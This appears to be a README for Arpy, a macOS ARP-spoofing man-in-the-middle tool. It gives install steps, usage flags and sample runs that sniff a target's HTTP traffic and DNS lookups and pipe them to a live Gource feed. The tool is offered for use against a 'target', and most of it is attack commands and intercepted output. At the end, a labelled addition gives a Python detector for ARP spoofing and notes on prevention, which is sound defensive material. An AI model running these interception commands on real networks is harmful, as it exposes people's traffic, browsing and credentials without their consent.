Arpy - Mac OSX ARP Spoof (MiTM) Tool

Arpy is an easy-to-use ARP spoofing MiTM tool for Mac.

It provides 3 targeted functions:

  • Packet sniffing
  • Visited domains
  • Visited domains with Gource

Requirements:

  • Python 2.7
  • Gource
  • Scapy
  • libdnet

    Installation:

    • Gource:
    brew install gource

    • Scapy:
    pip install scapy

    • libdnet:
    git clone https://github.com/dugsong/libdnet.git
    cd libdnet
    ./configure && make && make install
    cd python
    python setup.py install
    

    Usage:

    ivanvza:~/ > sudo arpy
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>
    
    ARP MiTM Tool
    
    Options:
      -h, --help            show this help message and exit
      -t TARGET, --target=TARGET
                            The Target IP
      -g GATEWAY, --gateway=GATEWAY
                            The Gateway
      -i INTERFACE, --interface=INTERFACE
                            Interface to use
      --tcp                 Filters out only tcp traffic
      --udp                 Filters out only udp traffic
      -d D_PORT, --destination_port=D_PORT
                            Filter for a destination port
      -s S_PORT, --source_port=S_PORT
                            Filter for a source port
      --sniff               Sniff all passing data
      --sniff-dns           Sniff only searched domains
      --sniff-dns-gource    Output target's DNS searches in gource format
      -v                    Verbose scapy packet print
    

    Packet Sniffer:

    This is the packet sniffer; it lets you see your target's traffic.

    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    
      [Info] Starting Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))
    
    [Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
    GET / HTTP/1.1
    User-Agent: curl/7.37.1
    Host: ivanvza.ninja
    Accept: */*
    
    
    
    [Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
    HTTP/1.1 200 OK
    Vary: Accept-Encoding
    Content-Type: text/html
    Accept-Ranges: bytes
    ETag: "2719538271"
    Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
    Content-Length: 3213
    Date: Fri, 29 May 2015 20:15:06 GMT
    Server: Microsoft IIS
    
    <html>
         <title>><></title>
        <body>
            <pre style="line-height: 1.25; white-space: pre;">
                      SORRY            /
                                      /
                  This page does     /
               ]   not exist yet.    [    ,'|
               ]                     [   /  |
               ]___               ___[ ,'   |
               ]  ]             /[  [ |:   |
               ]  ]            / [  [ |:   |
               ]  ]  ]         [  [  [ |:   |
               ]  ]  ]__     __[  [  [ |:   |
               ]  ]  ] ] _ /[ [  [  [ |:   |
               ]  ]  ] ] (#) [ [  [  [ :===='
               ]  ]  ]_].nHn.[_[  [  [
               ]  ]  ]  HHHHH. [  [  [
               ]  ] /   `HH("N   [  [
               ]__]/     HHH  "  [__[
               ]         NNN         [
               ]         N/"         [
               ]         N H         [
              /          N            
             /           q,            
            /                           
            </pre>
            <h3 id="list"><h3>
        </body>
    <script>
    
    // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
    var RTCPeerConnection = /*window.RTCPeerConnection ||

    DNS Sniff:

    This feature lets you see the domain names your target is currently requesting.

    ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
             - @viljoenivan
    
    
      [Info] Starting DNS Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Done...
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.

    DNS Sniff With Gource:

    This feature is more or less the same as the one above; however, it adds the ability to pipe the output through Gource to get a live feed of what your target is viewing.

    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
    [INFO] For a live gource feed run this command in parallel with this one:
    
    tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
    
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
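
Seen from the network side, ARP spoofing between a target and its gateway leaves a recognisable trace: the gateway's IP starts resolving to a different MAC, and one MAC answers for several IPs. The detector below is an added example, not part of Arpy or of the original page; it assumes ARP reply lines in the text format printed by `tcpdump -n arp`, and the function name `detect_arp_spoof` and the MAC addresses in the sample are constructed for illustration.

```python
import re
from collections import defaultdict

# ARP reply text as printed by `tcpdump -n arp` (with or without -e).
REPLY = re.compile(
    r"Reply (\d+\.\d+\.\d+\.\d+) is-at ((?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)

# Constructed sample capture: IPs are the ones used on this page, MACs are made up.
SAMPLE = """\
20:15:01.100000 ARP, Request who-has 192.168.1.1 tell 192.168.1.3, length 28
20:15:01.100400 ARP, Reply 192.168.1.1 is-at 02:00:00:00:00:01, length 28
20:15:02.000000 ARP, Reply 192.168.1.3 is-at 02:00:00:00:00:03, length 28
20:15:05.000000 ARP, Reply 192.168.1.1 is-at 02:00:00:00:00:99, length 28
20:15:05.000100 ARP, Reply 192.168.1.3 is-at 02:00:00:00:00:99, length 28
20:15:07.000000 ARP, Reply 192.168.1.1 is-at 02:00:00:00:00:99, length 28
""".splitlines()

def detect_arp_spoof(lines, gateway_ip):
    """Return (severity, kind, subject, detail) alerts from ARP reply lines."""
    ip_to_mac, mac_to_ips = {}, defaultdict(set)
    reported, alerts = set(), []
    for line in lines:
        m = REPLY.search(line)
        if not m:
            continue  # requests and non-ARP lines assert no binding
        ip, mac = m.group(1), m.group(2).lower()
        old = ip_to_mac.get(ip)
        if old and old != mac:
            # The same IP is now claimed by a different MAC.
            sev = "critical" if ip == gateway_ip else "warning"
            alerts.append((sev, "binding-changed", ip, "%s -> %s" % (old, mac)))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1 and mac not in reported:
            # One MAC answering for several IPs; reported once per MAC.
            reported.add(mac)
            sev = "critical" if gateway_ip in mac_to_ips[mac] else "warning"
            ips = ", ".join(sorted(mac_to_ips[mac]))
            alerts.append((sev, "mac-claims-multiple-ips", mac, ips))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE, "192.168.1.1"):
        print("[%s] %s: %s (%s)" % alert)
```

Proxy-ARP routers and replaced network cards produce the same signals legitimately, so known devices need an allowlist. A static ARP entry for the gateway on the host, or Dynamic ARP Inspection on the switch, prevents the rebinding rather than just reporting it.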
    
